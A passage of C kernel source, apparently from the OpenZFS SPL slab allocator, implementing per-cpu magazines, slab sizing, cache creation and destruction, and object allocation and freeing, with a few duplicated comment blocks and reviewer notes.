skc->skc_obj_emergency_max = skc->skc_obj_emergency;
}
spin_unlock(&skc->skc_lock);
if (unlikely(!empty)) {
/* duplicate address in the tree; release everything */
free_pages(ske->ske_obj, order);
kfree(ske);
return (-EINVAL);
}
*obj = (void *)ske->ske_obj;
return (0);
}
/*
* Locate the passed object in the red black tree and free it.
*/
/*
 * Locate the passed object in the red black tree and free it.
 * Cache counters are adjusted under the lock; the pages themselves are
 * released after the lock is dropped.  Returns 0, or -ENOENT when the
 * object was not an emergency allocation of this cache.
 */
static int
spl_emergency_free(spl_kmem_cache_t *skc, void *obj)
{
spl_kmem_emergency_t *ske;
int order = get_order(skc->skc_obj_size);
spin_lock(&skc->skc_lock);
ske = spl_emergency_search(&skc->skc_emergency_tree, obj);
if (ske) {
rb_erase(&ske->ske_node, &skc->skc_emergency_tree);
skc->skc_obj_emergency--;
skc->skc_obj_total--;
}
spin_unlock(&skc->skc_lock);
if (ske == NULL)
return (-ENOENT);
free_pages(ske->ske_obj, order);
kfree(ske);
return (0);
}
/*
* Release objects from the per-cpu magazine back to their slab. The flush
* argument contains the max number of entries to remove from the magazine.
*/
/*
 * Release objects from the per-cpu magazine back to their slab. The flush
 * argument contains the max number of entries to remove from the magazine.
 * Caller must hold skc->skc_lock; remaining entries are compacted to the
 * front of the magazine.
 */
static void
__spl_cache_flush(spl_kmem_cache_t *skc, spl_kmem_magazine_t *skm, int flush)
{
int i, count = MIN(flush, skm->skm_avail);
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(skm->skm_magic == SKM_MAGIC);
ASSERT(spin_is_locked(&skc->skc_lock));
for (i = 0; i < count; i++)
spl_cache_shrink(skc, skm->skm_objs[i]);
skm->skm_avail -= count;
/* slide the surviving entries down over the flushed ones */
memmove(skm->skm_objs, &(skm->skm_objs[count]),
sizeof (void *) * skm->skm_avail);
}
/* Locked wrapper around __spl_cache_flush() for callers without the lock. */
static void
spl_cache_flush(spl_kmem_cache_t *skc, spl_kmem_magazine_t *skm, int flush)
{
spin_lock(&skc->skc_lock);
__spl_cache_flush(skc, skm, flush);
spin_unlock(&skc->skc_lock);
}
/*
 * Age out idle objects from the calling cpu's magazine. Executed on
 * every cpu via on_each_cpu(), so it runs in interrupt context with
 * interrupts disabled (see the ASSERTs below).
 */
static void
spl_magazine_age(void *data)
{
	spl_kmem_cache_t *skc = (spl_kmem_cache_t *)data;
	spl_kmem_magazine_t *skm = skc->skc_mag[smp_processor_id()];

	ASSERT(skm->skm_magic == SKM_MAGIC);
	ASSERT(skm->skm_cpu == smp_processor_id());
	ASSERT(irqs_disabled());

	/* There are no available objects or they are too young to age out */
	if ((skm->skm_avail == 0) ||
	    time_before(jiffies, skm->skm_age + skc->skc_delay * HZ))
		return;

	/*
	 * Because we're executing in interrupt context we may have
	 * interrupted the holder of this lock. To avoid a potential
	 * deadlock return if the lock is contended.
	 */
	if (!spin_trylock(&skc->skc_lock))
		return;

	/* Flush up to skm_refill entries back to their slabs. */
	__spl_cache_flush(skc, skm, skm->skm_refill);
	spin_unlock(&skc->skc_lock);
}
/*
* Called regularly to keep a downward pressure on the cache.
*
* Objects older than skc->skc_delay seconds in the per-cpu magazines will
* be returned to the caches. This is done to prevent idle magazines from
* holding memory which could be better used elsewhere. The delay is
* present to prevent thrashing the magazine.
*
* The newly released objects may result in empty partial slabs. Those
* slabs should be released to the system. Otherwise moving the objects
* out of the magazines is just wasted work.
*/
static void
spl_cache_age(void *data)
{
	spl_kmem_cache_t *skc = (spl_kmem_cache_t *)data;
	taskqid_t id = 0;

	ASSERT(skc->skc_magic == SKC_MAGIC);

	/* Dynamically disabled at run time */
	if (!(spl_kmem_cache_expire & KMC_EXPIRE_AGE))
		return;

	/* Hold a reference so a concurrent destroy cannot free skc under us. */
	atomic_inc(&skc->skc_ref);

	/* Drain aged entries from every online cpu's magazine. */
	if (!(skc->skc_flags & KMC_NOMAGAZINE))
		on_each_cpu(spl_magazine_age, skc, 1);

	spl_slab_reclaim(skc);

	/* Re-dispatch ourselves unless the cache is being destroyed. */
	while (!test_bit(KMC_BIT_DESTROY, &skc->skc_flags) && !id) {
		id = taskq_dispatch_delay(
		    spl_kmem_cache_taskq, spl_cache_age, skc, TQ_SLEEP,
		    ddi_get_lbolt() + skc->skc_delay / 3 * HZ);

		/* Destroy issued after dispatch immediately cancel it */
		if (test_bit(KMC_BIT_DESTROY, &skc->skc_flags) && id)
			taskq_cancel_id(spl_kmem_cache_taskq, id);
	}

	spin_lock(&skc->skc_lock);
	skc->skc_taskqid = id;
	spin_unlock(&skc->skc_lock);

	atomic_dec(&skc->skc_ref);
}
/*
* Size a slab based on the size of each aligned object plus spl_kmem_obj_t.
* When on-slab we want to target spl_kmem_cache_obj_per_slab. However,
* for very small objects we may end up with more than this so as not
* to waste space in the minimal allocation of a single page. Also for
* very large objects we may use as few as spl_kmem_cache_obj_per_slab_min,
* lower than this and we will fail.
*/
static int
spl_slab_size(spl_kmem_cache_t *skc, uint32_t *objs, uint32_t *size)
{
	uint32_t sks_size, obj_size, max_size, tgt_size, tgt_objs;

	if (skc->skc_flags & KMC_OFFSLAB) {
		/* Objects live off-slab; the slab itself holds only metadata. */
		tgt_objs = spl_kmem_cache_obj_per_slab;
		tgt_size = P2ROUNDUP(sizeof (spl_kmem_slab_t), PAGE_SIZE);

		/* Off-slab kmem objects are still bound by the max order. */
		if ((skc->skc_flags & KMC_KMEM) &&
		    (spl_obj_size(skc) > (SPL_MAX_ORDER_NR_PAGES * PAGE_SIZE)))
			return (-ENOSPC);
	} else {
		sks_size = spl_sks_size(skc);
		obj_size = spl_obj_size(skc);
		max_size = (spl_kmem_cache_max_size * 1024 * 1024);
		tgt_size = (spl_kmem_cache_obj_per_slab * obj_size + sks_size);

		/*
		 * KMC_KMEM slabs are allocated by __get_free_pages() which
		 * rounds up to the nearest order. Knowing this the size
		 * should be rounded up to the next power of two with a hard
		 * maximum defined by the maximum allowed allocation order.
		 */
		if (skc->skc_flags & KMC_KMEM) {
			max_size = SPL_MAX_ORDER_NR_PAGES * PAGE_SIZE;
			tgt_size = MIN(max_size,
			    PAGE_SIZE * (1 << MAX(get_order(tgt_size) - 1, 1)));
		}

		/* Clamp to max_size, recomputing the object count to fit. */
		if (tgt_size <= max_size) {
			tgt_objs = (tgt_size - sks_size) / obj_size;
		} else {
			tgt_objs = (max_size - sks_size) / obj_size;
			tgt_size = (tgt_objs * obj_size) + sks_size;
		}
	}

	if (tgt_objs == 0)
		return (-ENOSPC);

	*objs = tgt_objs;
	*size = tgt_size;

	return (0);
}
/*
* Make a guess at reasonable per-cpu magazine size based on the size of
* each object and the cost of caching N of them in each magazine. Long
* term this should really adapt based on an observed usage heuristic.
*/
static int
spl_magazine_size(spl_kmem_cache_t *skc)
{
	uint32_t obj_size = spl_obj_size(skc);
	int entries;

	/* Explicit tunable override, clamped to the range [2, 256]. */
	if (spl_kmem_cache_magazine_size > 0)
		return (MAX(MIN(spl_kmem_cache_magazine_size, 256), 2));

	/* Per-magazine sizes below assume a 4Kib page size */
	if (obj_size > (PAGE_SIZE * 256))
		entries = 4;	/* Minimum 4Mib per-magazine */
	else if (obj_size > (PAGE_SIZE * 32))
		entries = 16;	/* Minimum 2Mib per-magazine */
	else if (obj_size > (PAGE_SIZE))
		entries = 64;	/* Minimum 256Kib per-magazine */
	else if (obj_size > (PAGE_SIZE / 4))
		entries = 128;	/* Minimum 128Kib per-magazine */
	else
		entries = 256;

	return (entries);
}
/*
* Allocate a per-cpu magazine to associate with a specific core.
*/
static spl_kmem_magazine_t *
spl_magazine_alloc(spl_kmem_cache_t *skc, int cpu)
{
	spl_kmem_magazine_t *mag;
	int bytes = sizeof (spl_kmem_magazine_t) +
	    sizeof (void *) * skc->skc_mag_size;

	/* Allocate from the memory node backing this cpu. */
	mag = kmalloc_node(bytes, GFP_KERNEL, cpu_to_node(cpu));
	if (mag == NULL)
		return (NULL);

	mag->skm_magic = SKM_MAGIC;
	mag->skm_avail = 0;
	mag->skm_size = skc->skc_mag_size;
	mag->skm_refill = skc->skc_mag_refill;
	mag->skm_cache = skc;
	mag->skm_age = jiffies;
	mag->skm_cpu = cpu;

	return (mag);
}
/*
* Free a per-cpu magazine associated with a specific core.
*/
static void
spl_magazine_free(spl_kmem_magazine_t *skm)
{
	ASSERT(skm->skm_magic == SKM_MAGIC);
	/* Magazines must be drained (via spl_cache_flush) before freeing. */
	ASSERT(skm->skm_avail == 0);
	kfree(skm);
}
/*
* Create all pre-cpu magazines of reasonable sizes.
*/
static int
spl_magazine_create(spl_kmem_cache_t *skc)
{
	int i;

	if (skc->skc_flags & KMC_NOMAGAZINE)
		return (0);

	skc->skc_mag_size = spl_magazine_size(skc);
	skc->skc_mag_refill = (skc->skc_mag_size + 1) / 2;

	for_each_online_cpu(i) {
		skc->skc_mag[i] = spl_magazine_alloc(skc, i);
		if (!skc->skc_mag[i]) {
			/*
			 * Roll back the allocations made so far. Online CPU
			 * ids need not be contiguous, so any slot belonging
			 * to an offline cpu is still NULL (skc is zeroed at
			 * creation) and must be skipped rather than passed
			 * to spl_magazine_free() which dereferences it.
			 */
			for (i--; i >= 0; i--) {
				if (skc->skc_mag[i]) {
					spl_magazine_free(skc->skc_mag[i]);
					skc->skc_mag[i] = NULL;
				}
			}
			return (-ENOMEM);
		}
	}

	return (0);
}
/*
* Destroy all pre-cpu magazines.
*/
static void
spl_magazine_destroy(spl_kmem_cache_t *skc)
{
	spl_kmem_magazine_t *skm;
	int i;

	if (skc->skc_flags & KMC_NOMAGAZINE)
		return;

	for_each_online_cpu(i) {
		skm = skc->skc_mag[i];
		/* Drain any cached objects back to their slabs, then free. */
		spl_cache_flush(skc, skm, skm->skm_avail);
		spl_magazine_free(skm);
	}
}
/*
* Create a object cache based on the following arguments:
* name cache name
* size cache object size
* align cache object alignment
* ctor cache object constructor
* dtor cache object destructor
* reclaim cache object reclaim
* priv cache private data for ctor/dtor/reclaim
* vmp unused must be NULL
* flags
* KMC_NOTOUCH Disable cache object aging (unsupported)
* KMC_NODEBUG Disable debugging (unsupported)
* KMC_NOHASH Disable hashing (unsupported)
* KMC_QCACHE Disable qcache (unsupported)
* KMC_NOMAGAZINE Enabled for kmem/vmem, Disabled for Linux slab
* KMC_KMEM Force kmem backed cache
* KMC_VMEM Force vmem backed cache
* KMC_SLAB Force Linux slab backed cache
* KMC_OFFSLAB Locate objects off the slab
*/
spl_kmem_cache_t *
spl_kmem_cache_create(char *name, size_t size, size_t align,
    spl_kmem_ctor_t ctor, spl_kmem_dtor_t dtor, spl_kmem_reclaim_t reclaim,
    void *priv, void *vmp, int flags)
{
	gfp_t lflags = kmem_flags_convert(KM_SLEEP);
	spl_kmem_cache_t *skc;
	int rc;

	/*
	 * Unsupported flags
	 */
	ASSERT0(flags & KMC_NOMAGAZINE);
	ASSERT0(flags & KMC_NOHASH);
	ASSERT0(flags & KMC_QCACHE);
	ASSERT(vmp == NULL);

	might_sleep();

	/*
	 * Allocate memory for a new cache and initialize it. Unfortunately,
	 * this usually ends up being a large allocation of ~32k because
	 * we need to allocate enough memory for the worst case number of
	 * cpus in the magazine, skc_mag[NR_CPUS].
	 */
	skc = kzalloc(sizeof (*skc), lflags);
	if (skc == NULL)
		return (NULL);

	skc->skc_magic = SKC_MAGIC;
	skc->skc_name_size = strlen(name) + 1;
	skc->skc_name = (char *)kmalloc(skc->skc_name_size, lflags);
	if (skc->skc_name == NULL) {
		kfree(skc);
		return (NULL);
	}
	/* skc_name_size includes the NUL so this copy is always terminated. */
	strncpy(skc->skc_name, name, skc->skc_name_size);
	skc->skc_ctor = ctor;
	skc->skc_dtor = dtor;
	skc->skc_reclaim = reclaim;
	skc->skc_private = priv;
	skc->skc_vmp = vmp;
	skc->skc_linux_cache = NULL;
	skc->skc_flags = flags;
	skc->skc_obj_size = size;
	skc->skc_obj_align = SPL_KMEM_CACHE_ALIGN;
	skc->skc_delay = SPL_KMEM_CACHE_DELAY;
	skc->skc_reap = SPL_KMEM_CACHE_REAP;
	atomic_set(&skc->skc_ref, 0);

	INIT_LIST_HEAD(&skc->skc_list);
	INIT_LIST_HEAD(&skc->skc_complete_list);
	INIT_LIST_HEAD(&skc->skc_partial_list);
	skc->skc_emergency_tree = RB_ROOT;
	spin_lock_init(&skc->skc_lock);
	init_waitqueue_head(&skc->skc_waitq);

	/* Zero all statistics counters (skc is kzalloc'd, but be explicit). */
	skc->skc_slab_fail = 0;
	skc->skc_slab_create = 0;
	skc->skc_slab_destroy = 0;
	skc->skc_slab_total = 0;
	skc->skc_slab_alloc = 0;
	skc->skc_slab_max = 0;
	skc->skc_obj_total = 0;
	skc->skc_obj_alloc = 0;
	skc->skc_obj_max = 0;
	skc->skc_obj_deadlock = 0;
	skc->skc_obj_emergency = 0;
	skc->skc_obj_emergency_max = 0;

	/*
	 * Verify the requested alignment restriction is sane.
	 */
	if (align) {
		VERIFY(ISP2(align));
		VERIFY3U(align, >=, SPL_KMEM_CACHE_ALIGN);
		VERIFY3U(align, <=, PAGE_SIZE);
		skc->skc_obj_align = align;
	}

	/*
	 * When no specific type of slab is requested (kmem, vmem, or
	 * linuxslab) then select a cache type based on the object size
	 * and default tunables.
	 */
	if (!(skc->skc_flags & (KMC_KMEM | KMC_VMEM | KMC_SLAB))) {
		/*
		 * Objects smaller than spl_kmem_cache_slab_limit can
		 * use the Linux slab for better space-efficiency. By
		 * default this functionality is disabled until its
		 * performance characteristics are fully understood.
		 */
		if (spl_kmem_cache_slab_limit &&
		    size <= (size_t)spl_kmem_cache_slab_limit)
			skc->skc_flags |= KMC_SLAB;

		/*
		 * Small objects, less than spl_kmem_cache_kmem_limit per
		 * object should use kmem because their slabs are small.
		 */
		else if (spl_obj_size(skc) <= spl_kmem_cache_kmem_limit)
			skc->skc_flags |= KMC_KMEM;

		/*
		 * All other objects are considered large and are placed
		 * on vmem backed slabs.
		 */
		else
			skc->skc_flags |= KMC_VMEM;
	}

	/*
	 * Given the type of slab allocate the required resources.
	 */
	if (skc->skc_flags & (KMC_KMEM | KMC_VMEM)) {
		rc = spl_slab_size(skc,
		    &skc->skc_slab_objs, &skc->skc_slab_size);
		if (rc)
			goto out;

		rc = spl_magazine_create(skc);
		if (rc)
			goto out;
	} else {
		if (size > (SPL_MAX_KMEM_ORDER_NR_PAGES * PAGE_SIZE)) {
			/*
			 * NOTE(review): positive error values here, negative
			 * elsewhere; rc is never propagated (NULL returned),
			 * so this is informational only.
			 */
			rc = EINVAL;
			goto out;
		}

		skc->skc_linux_cache = kmem_cache_create(
		    skc->skc_name, size, align, 0, NULL);
		if (skc->skc_linux_cache == NULL) {
			rc = ENOMEM;
			goto out;
		}

#if defined(HAVE_KMEM_CACHE_ALLOCFLAGS)
		skc->skc_linux_cache->allocflags |= __GFP_COMP;
#elif defined(HAVE_KMEM_CACHE_GFPFLAGS)
		skc->skc_linux_cache->gfpflags |= __GFP_COMP;
#endif
		/* Linux slab caches never use the per-cpu magazines. */
		skc->skc_flags |= KMC_NOMAGAZINE;
	}

	/* Start the periodic aging task when enabled via the tunable. */
	if (spl_kmem_cache_expire & KMC_EXPIRE_AGE)
		skc->skc_taskqid = taskq_dispatch_delay(spl_kmem_cache_taskq,
		    spl_cache_age, skc, TQ_SLEEP,
		    ddi_get_lbolt() + skc->skc_delay / 3 * HZ);

	/* Make the cache visible on the global list. */
	down_write(&spl_kmem_cache_sem);
	list_add_tail(&skc->skc_list, &spl_kmem_cache_list);
	up_write(&spl_kmem_cache_sem);

	return (skc);
out:
	kfree(skc->skc_name);
	kfree(skc);
	return (NULL);
}
EXPORT_SYMBOL(spl_kmem_cache_create);
/*
* Register a move callback for cache defragmentation.
* XXX: Unimplemented but harmless to stub out for now.
*/
void
spl_kmem_cache_set_move(spl_kmem_cache_t *skc,
    kmem_cbrc_t (move)(void *, void *, size_t, void *))
{
	/* Intentionally a no-op; only validate the callback argument. */
	ASSERT(move != NULL);
}
EXPORT_SYMBOL(spl_kmem_cache_set_move);
/*
* Destroy a cache and all objects associated with the cache.
*/
void
spl_kmem_cache_destroy(spl_kmem_cache_t *skc)
{
	DECLARE_WAIT_QUEUE_HEAD(wq);
	taskqid_t id;

	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(skc->skc_flags & (KMC_KMEM | KMC_VMEM | KMC_SLAB));

	/* Unlink from the global list so no new users can find the cache. */
	down_write(&spl_kmem_cache_sem);
	list_del_init(&skc->skc_list);
	up_write(&spl_kmem_cache_sem);

	/* Cancel any and wait for any pending delayed tasks */
	VERIFY(!test_and_set_bit(KMC_BIT_DESTROY, &skc->skc_flags));

	spin_lock(&skc->skc_lock);
	id = skc->skc_taskqid;
	spin_unlock(&skc->skc_lock);

	taskq_cancel_id(spl_kmem_cache_taskq, id);

	/*
	 * Wait until all current callers complete, this is mainly
	 * to catch the case where a low memory situation triggers a
	 * cache reaping action which races with this destroy.
	 *
	 * NOTE(review): 'wq' is a function-local wait queue that nothing
	 * ever wakes; wait_event() only re-tests its condition on wake-up,
	 * so confirm this cannot stall when skc_ref is nonzero here.
	 */
	wait_event(wq, atomic_read(&skc->skc_ref) == 0);

	if (skc->skc_flags & (KMC_KMEM | KMC_VMEM)) {
		spl_magazine_destroy(skc);
		spl_slab_reclaim(skc);
	} else {
		ASSERT(skc->skc_flags & KMC_SLAB);
		kmem_cache_destroy(skc->skc_linux_cache);
	}

	spin_lock(&skc->skc_lock);

	/*
	 * Validate there are no objects in use and free all the
	 * spl_kmem_slab_t, spl_kmem_obj_t, and object buffers.
	 */
	ASSERT3U(skc->skc_slab_alloc, ==, 0);
	ASSERT3U(skc->skc_obj_alloc, ==, 0);
	ASSERT3U(skc->skc_slab_total, ==, 0);
	ASSERT3U(skc->skc_obj_total, ==, 0);
	ASSERT3U(skc->skc_obj_emergency, ==, 0);
	ASSERT(list_empty(&skc->skc_complete_list));

	spin_unlock(&skc->skc_lock);

	kfree(skc->skc_name);
	kfree(skc);
}
EXPORT_SYMBOL(spl_kmem_cache_destroy);
/*
* Allocate an object from a slab attached to the cache. This is used to
* repopulate the per-cpu magazine caches in batches when they run low.
*/
static void *
spl_cache_obj(spl_kmem_cache_t *skc, spl_kmem_slab_t *sks)
{
	spl_kmem_obj_t *sko;

	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(sks->sks_magic == SKS_MAGIC);
	ASSERT(spin_is_locked(&skc->skc_lock));

	/* The caller guarantees the slab has at least one free object. */
	sko = list_entry(sks->sks_free_list.next, spl_kmem_obj_t, sko_list);
	ASSERT(sko->sko_magic == SKO_MAGIC);
	ASSERT(sko->sko_addr != NULL);

	/* Remove from sks_free_list */
	list_del_init(&sko->sko_list);

	sks->sks_age = jiffies;
	sks->sks_ref++;
	skc->skc_obj_alloc++;

	/* Track max obj usage statistics */
	if (skc->skc_obj_alloc > skc->skc_obj_max)
		skc->skc_obj_max = skc->skc_obj_alloc;

	/* Track max slab usage statistics */
	if (sks->sks_ref == 1) {
		skc->skc_slab_alloc++;
		if (skc->skc_slab_alloc > skc->skc_slab_max)
			skc->skc_slab_max = skc->skc_slab_alloc;
	}

	return (sko->sko_addr);
}
/*
* Generic slab allocation function to run by the global work queues.
* It is responsible for allocating a new slab, linking it in to the list
* of partial slabs, and then waking any waiters.
*/
static void
spl_cache_grow_work(void *data)
{
	spl_kmem_alloc_t *ska = (spl_kmem_alloc_t *)data;
	spl_kmem_cache_t *skc = ska->ska_cache;
	spl_kmem_slab_t *sks;

#if defined(PF_MEMALLOC_NOIO)
	/* Suppress I/O during the allocation to avoid reclaim recursion. */
	unsigned noio_flag = memalloc_noio_save();
	sks = spl_slab_alloc(skc, ska->ska_flags);
	memalloc_noio_restore(noio_flag);
#else
	fstrans_cookie_t cookie = spl_fstrans_mark();
	sks = spl_slab_alloc(skc, ska->ska_flags);
	spl_fstrans_unmark(cookie);
#endif

	spin_lock(&skc->skc_lock);
	if (sks) {
		/* Account for the new slab and make it available. */
		skc->skc_slab_total++;
		skc->skc_obj_total += sks->sks_objs;
		list_add_tail(&sks->sks_list, &skc->skc_partial_list);
	}

	/* Drop the reference taken when this work item was dispatched. */
	atomic_dec(&skc->skc_ref);
	smp_mb__before_atomic();
	clear_bit(KMC_BIT_GROWING, &skc->skc_flags);
	clear_bit(KMC_BIT_DEADLOCKED, &skc->skc_flags);
	smp_mb__after_atomic();
	wake_up_all(&skc->skc_waitq);
	spin_unlock(&skc->skc_lock);

	kfree(ska);
}
/*
* Returns non-zero when a new slab should be available.
*/
static int
spl_cache_grow_wait(spl_kmem_cache_t *skc)
{
	/* True once the GROWING bit clears, i.e. a grow attempt finished. */
	return (test_bit(KMC_BIT_GROWING, &skc->skc_flags) == 0);
}
/*
* No available objects on any slabs, create a new slab. Note that this
* functionality is disabled for KMC_SLAB caches which are backed by the
* Linux slab.
*/
static int
spl_cache_grow(spl_kmem_cache_t *skc, int flags, void **obj)
{
	int remaining, rc = 0;

	ASSERT0(flags & ~KM_PUBLIC_MASK);
	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT((skc->skc_flags & KMC_SLAB) == 0);

	might_sleep();
	*obj = NULL;

	/*
	 * Before allocating a new slab wait for any reaping to complete and
	 * then return so the local magazine can be rechecked for new objects.
	 */
	if (test_bit(KMC_BIT_REAPING, &skc->skc_flags)) {
		rc = spl_wait_on_bit(&skc->skc_flags, KMC_BIT_REAPING,
		    TASK_UNINTERRUPTIBLE);
		return (rc ? rc : -EAGAIN);
	}

	/*
	 * This is handled by dispatching a work request to the global work
	 * queue. This allows us to asynchronously allocate a new slab while
	 * retaining the ability to safely fall back to a smaller synchronous
	 * allocations to ensure forward progress is always maintained.
	 */
	if (test_and_set_bit(KMC_BIT_GROWING, &skc->skc_flags) == 0) {
		spl_kmem_alloc_t *ska;

		ska = kmalloc(sizeof (*ska), kmem_flags_convert(flags));
		if (ska == NULL) {
			/* Undo the GROWING bit and release any waiters. */
			clear_bit_unlock(KMC_BIT_GROWING, &skc->skc_flags);
			smp_mb__after_atomic();
			wake_up_all(&skc->skc_waitq);
			return (-ENOMEM);
		}

		/* Reference dropped by spl_cache_grow_work(). */
		atomic_inc(&skc->skc_ref);
		ska->ska_cache = skc;
		ska->ska_flags = flags;
		taskq_init_ent(&ska->ska_tqe);
		taskq_dispatch_ent(spl_kmem_cache_taskq,
		    spl_cache_grow_work, ska, 0, &ska->ska_tqe);
	}

	/*
	 * The goal here is to only detect the rare case where a virtual slab
	 * allocation has deadlocked. We must be careful to minimize the use
	 * of emergency objects which are more expensive to track. Therefore,
	 * we set a very long timeout for the asynchronous allocation and if
	 * the timeout is reached the cache is flagged as deadlocked. From
	 * this point only new emergency objects will be allocated until the
	 * asynchronous allocation completes and clears the deadlocked flag.
	 */
	if (test_bit(KMC_BIT_DEADLOCKED, &skc->skc_flags)) {
		rc = spl_emergency_alloc(skc, flags, obj);
	} else {
		remaining = wait_event_timeout(skc->skc_waitq,
		    spl_cache_grow_wait(skc), HZ / 10);

		if (!remaining) {
			spin_lock(&skc->skc_lock);
			if (test_bit(KMC_BIT_GROWING, &skc->skc_flags)) {
				set_bit(KMC_BIT_DEADLOCKED, &skc->skc_flags);
				skc->skc_obj_deadlock++;
			}
			spin_unlock(&skc->skc_lock);
		}

		rc = -ENOMEM;
	}

	return (rc);
}
/*
* Refill a per-cpu magazine with objects from the slabs for this cache.
* Ideally the magazine can be repopulated using existing objects which have
* been released, however if we are unable to locate enough free objects new
* slabs of objects will be created. On success NULL is returned, otherwise
* the address of a single emergency object is returned for use by the caller.
*/
static void *
spl_cache_refill(spl_kmem_cache_t *skc, spl_kmem_magazine_t *skm, int flags)
{
	spl_kmem_slab_t *sks;
	int count = 0, rc, refill;
	void *obj = NULL;

	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(skm->skm_magic == SKM_MAGIC);

	/* Never refill beyond the magazine's remaining free capacity. */
	refill = MIN(skm->skm_refill, skm->skm_size - skm->skm_avail);
	spin_lock(&skc->skc_lock);

	while (refill > 0) {
		/* No slabs available we may need to grow the cache */
		if (list_empty(&skc->skc_partial_list)) {
			/*
			 * Drop the lock and re-enable interrupts while a
			 * new slab is (possibly asynchronously) created;
			 * the caller re-enables interrupts on return.
			 */
			spin_unlock(&skc->skc_lock);
			local_irq_enable();

			rc = spl_cache_grow(skc, flags, &obj);
			local_irq_disable();

			/* Emergency object for immediate use by caller */
			if (rc == 0 && obj != NULL)
				return (obj);

			if (rc)
				goto out;

			/* Rescheduled to different CPU skm is not local */
			if (skm != skc->skc_mag[smp_processor_id()])
				goto out;

			/*
			 * Potentially rescheduled to the same CPU but
			 * allocations may have occurred from this CPU while
			 * we were sleeping so recalculate max refill.
			 */
			refill = MIN(refill, skm->skm_size - skm->skm_avail);

			spin_lock(&skc->skc_lock);
			continue;
		}

		/* Grab the next available slab */
		sks = list_entry((&skc->skc_partial_list)->next,
		    spl_kmem_slab_t, sks_list);
		ASSERT(sks->sks_magic == SKS_MAGIC);
		ASSERT(sks->sks_ref < sks->sks_objs);
		ASSERT(!list_empty(&sks->sks_free_list));

		/*
		 * Consume as many objects as needed to refill the requested
		 * cache. We must also be careful not to overfill it.
		 * (The '++count' term is always non-zero here and exists
		 * only to count consumed objects as a side effect.)
		 */
		while (sks->sks_ref < sks->sks_objs && refill-- > 0 &&
		    ++count) {
			ASSERT(skm->skm_avail < skm->skm_size);
			ASSERT(count < skm->skm_size);
			skm->skm_objs[skm->skm_avail++] =
			    spl_cache_obj(skc, sks);
		}

		/* Move slab to skc_complete_list when full */
		if (sks->sks_ref == sks->sks_objs) {
			list_del(&sks->sks_list);
			list_add(&sks->sks_list, &skc->skc_complete_list);
		}
	}

	spin_unlock(&skc->skc_lock);
out:
	return (NULL);
}
/*
* Release an object back to the slab from which it came.
*/
static void
spl_cache_shrink(spl_kmem_cache_t *skc, void *obj)
{
	spl_kmem_slab_t *sks = NULL;
	spl_kmem_obj_t *sko = NULL;

	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(spin_is_locked(&skc->skc_lock));

	/* Recover the per-object metadata from the object address. */
	sko = spl_sko_from_obj(skc, obj);
	ASSERT(sko->sko_magic == SKO_MAGIC);
	sks = sko->sko_slab;
	ASSERT(sks->sks_magic == SKS_MAGIC);
	ASSERT(sks->sks_cache == skc);
	list_add(&sko->sko_list, &sks->sks_free_list);

	sks->sks_age = jiffies;
	sks->sks_ref--;
	skc->skc_obj_alloc--;

	/*
	 * Move slab to skc_partial_list when no longer full. Slabs
	 * are added to the head to keep the partial list in quasi-full
	 * sorted order. Fuller at the head, emptier at the tail.
	 */
	if (sks->sks_ref == (sks->sks_objs - 1)) {
		list_del(&sks->sks_list);
		list_add(&sks->sks_list, &skc->skc_partial_list);
	}

	/*
	 * Move empty slabs to the end of the partial list so
	 * they can be easily found and freed during reclamation.
	 */
	if (sks->sks_ref == 0) {
		list_del(&sks->sks_list);
		list_add_tail(&sks->sks_list, &skc->skc_partial_list);
		skc->skc_slab_alloc--;
	}
}
/*
* Allocate an object from the per-cpu magazine, or if the magazine
* is empty directly allocate from a slab and repopulate the magazine.
*/
void *
spl_kmem_cache_alloc(spl_kmem_cache_t *skc, int flags)
{
	spl_kmem_magazine_t *skm;
	void *obj = NULL;

	ASSERT0(flags & ~KM_PUBLIC_MASK);
	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(!test_bit(KMC_BIT_DESTROY, &skc->skc_flags));

	/* Hold a reference so a concurrent destroy cannot race with us. */
	atomic_inc(&skc->skc_ref);

	/*
	 * Allocate directly from a Linux slab. All optimizations are left
	 * to the underlying cache we only need to guarantee that KM_SLEEP
	 * callers will never fail.
	 */
	if (skc->skc_flags & KMC_SLAB) {
		struct kmem_cache *slc = skc->skc_linux_cache;
		do {
			obj = kmem_cache_alloc(slc, kmem_flags_convert(flags));
		} while ((obj == NULL) && !(flags & KM_NOSLEEP));

		goto ret;
	}

	local_irq_disable();

restart:
	/*
	 * Safe to update per-cpu structure without lock, but
	 * in the restart case we must be careful to reacquire
	 * the local magazine since this may have changed
	 * when we need to grow the cache.
	 */
	skm = skc->skc_mag[smp_processor_id()];
	ASSERT(skm->skm_magic == SKM_MAGIC);

	if (likely(skm->skm_avail)) {
		/* Object available in CPU cache, use it */
		obj = skm->skm_objs[--skm->skm_avail];
		skm->skm_age = jiffies;
	} else {
		obj = spl_cache_refill(skc, skm, flags);
		if ((obj == NULL) && !(flags & KM_NOSLEEP))
			goto restart;

		local_irq_enable();
		goto ret;
	}

	local_irq_enable();
	ASSERT(obj);
	ASSERT(IS_P2ALIGNED(obj, skc->skc_obj_align));

ret:
	/* Pre-emptively migrate object to CPU L1 cache */
	if (obj) {
		/*
		 * obj is already known non-NULL inside this branch; a
		 * previously redundant re-check was removed here.
		 */
		if (skc->skc_ctor)
			skc->skc_ctor(obj, skc->skc_private, flags);
		else
			prefetchw(obj);
	}

	atomic_dec(&skc->skc_ref);

	return (obj);
}
EXPORT_SYMBOL(spl_kmem_cache_alloc);
/*
 * Free an object back to the local per-cpu magazine, there is no
 * guarantee that this is the same magazine the object was originally
 * allocated from. We may need to flush an entire magazine back to
 * the slabs to make space.
 */
void
spl_kmem_cache_free(spl_kmem_cache_t *skc, void *obj)
{
	spl_kmem_magazine_t *skm;
	unsigned long flags;
	int do_reclaim = 0;
	int do_emergency = 0;

	ASSERT(skc->skc_magic == SKC_MAGIC);
	ASSERT(!test_bit(KMC_BIT_DESTROY, &skc->skc_flags));
	atomic_inc(&skc->skc_ref);

	/*
	 * Run the destructor
	 */
	if (skc->skc_dtor)
		skc->skc_dtor(obj, skc->skc_private);

	/*
	 * Free the object from the underlying Linux slab.
	 */
	if (skc->skc_flags & KMC_SLAB) {
